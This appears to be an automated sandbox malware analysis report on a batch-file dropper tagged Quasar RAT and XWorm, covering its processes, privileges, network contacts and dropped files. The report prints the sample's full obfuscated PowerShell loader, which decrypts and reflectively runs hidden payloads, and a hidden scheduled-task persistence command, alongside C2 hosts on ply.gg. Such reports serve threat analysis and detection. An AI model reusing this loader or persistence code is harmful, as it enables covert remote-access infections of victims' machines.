Malware Analysis Report

2024-10-23 21:28

Sample ID 240413-wk7t7afc78
Target Double.bat
SHA256 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
Tags
quasar xworm office04 rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f

Threat Level: Known bad

The file Double.bat was found to be: Known bad.

Malicious Activity Summary

quasar xworm office04 rat spyware trojan

Xworm

Detect Xworm Payload

Quasar RAT

Quasar payload

Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-13 17:59

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-13 17:59

Reported

2024-04-13 18:01

Platform

win10v2004-20240412-en

Max time kernel

54s

Max time network

63s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2364 wrote to memory of 1240 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2364 wrote to memory of 1240 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1240 wrote to memory of 4476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1240 wrote to memory of 4476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1240 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1240 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1308 wrote to memory of 2776 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1308 wrote to memory of 2776 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2776 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5096 wrote to memory of 3112 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5096 wrote to memory of 3112 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3112 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2028 wrote to memory of 4936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2028 wrote to memory of 4936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2028 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2028 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4276 wrote to memory of 2280 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 2280 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_330_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_330.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_330.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_330.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_330.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_330.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_585_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_585.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_585.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_585.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_585.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_585.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 traffic-collins.gl.at.ply.gg udp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 130.118.77.104.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yiarmb3f.iuv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1240-9-0x000001ADB6F00000-0x000001ADB6F22000-memory.dmp

memory/1240-10-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

memory/1240-11-0x000001ADB4DC0000-0x000001ADB4DD0000-memory.dmp

memory/1240-12-0x000001ADB4DC0000-0x000001ADB4DD0000-memory.dmp

memory/1240-13-0x000001ADB4DB0000-0x000001ADB4DB8000-memory.dmp

memory/1240-14-0x000001ADB7130000-0x000001ADB7270000-memory.dmp

memory/4476-16-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

memory/4476-17-0x000001BBD1F70000-0x000001BBD1F80000-memory.dmp

memory/4476-18-0x000001BBD1F70000-0x000001BBD1F80000-memory.dmp

memory/4476-28-0x000001BBD1F70000-0x000001BBD1F80000-memory.dmp

memory/4476-31-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8d49a4af7a844bfc7247d5670def557
SHA1 26ae0ce194a77a7a1887cf93741293fdfa6c94c4
SHA256 61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b
SHA512 9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

C:\Users\Admin\AppData\Roaming\startup_str_330.vbs

MD5 20b8c2322d21131b9f33f7f8aa143e41
SHA1 071b1e63bebd79345c9e62e8b81627fc639d611d
SHA256 0941acf3ffa1dc642b3b9913632e39fac19c63e97a3164159edb7edc5001f850
SHA512 91c13b7188947250f5e19b8f64862fb3142198523094ba89b1fb0dcb50e12686dc4e147c084efe59cfcd3eb210ea623e6f38d60abb8d59960dff70d388306524

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\startup_str_330.bat

MD5 948386c98184781df692e5f11ff558f7
SHA1 e8619faf83446ea78e456920834579bbf71aea20
SHA256 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
SHA512 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba

memory/5096-50-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

memory/5096-52-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp

memory/5096-51-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp

memory/5096-55-0x000001D6DE5B0000-0x000001D6DE8D4000-memory.dmp

memory/5096-56-0x000001D6DBF60000-0x000001D6DBF70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat

MD5 795363cfbf5d3fca47edc4cbc247a1c0
SHA1 9374d05486b0b62977825d07f748fa03cca3c864
SHA256 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6
SHA512 c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94

memory/1240-60-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

memory/5096-61-0x000001D6DEB50000-0x000001D6DEBA0000-memory.dmp

memory/5096-62-0x000001D6DEC60000-0x000001D6DED12000-memory.dmp

memory/5096-63-0x000001D6DFA00000-0x000001D6DFBC2000-memory.dmp

memory/2028-73-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

memory/2028-74-0x000001E0B4F10000-0x000001E0B4F18000-memory.dmp

memory/2028-75-0x000001E0B4F70000-0x000001E0B4F7C000-memory.dmp

memory/4936-86-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

memory/4936-87-0x000001F858C10000-0x000001F858C20000-memory.dmp

memory/4936-88-0x000001F858C10000-0x000001F858C20000-memory.dmp

memory/4936-90-0x00007FF8175E0000-0x00007FF8180A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d51735559407dba515c4b8861b4c1a56
SHA1 4902dbc4f4322b549c42ddec8d2e642c96491e9d
SHA256 24cf099c1f20992a70fb72d21f41b766178f71ee7585bac522c8dbb3ae06f263
SHA512 fe1a23a0273c2cbf7510023f4368d19b4aab362baae6a35698e29c8232aeaf8261fc9e351549a9d9aa1130230769e6d8206cbf757056400b5cbc823e2dcc010a

C:\Users\Admin\AppData\Roaming\startup_str_585.vbs

MD5 753fefb78d188fffd02e5630c438f15e
SHA1 54712eb2b053ab77eab8c43339ee1bfefe877c29
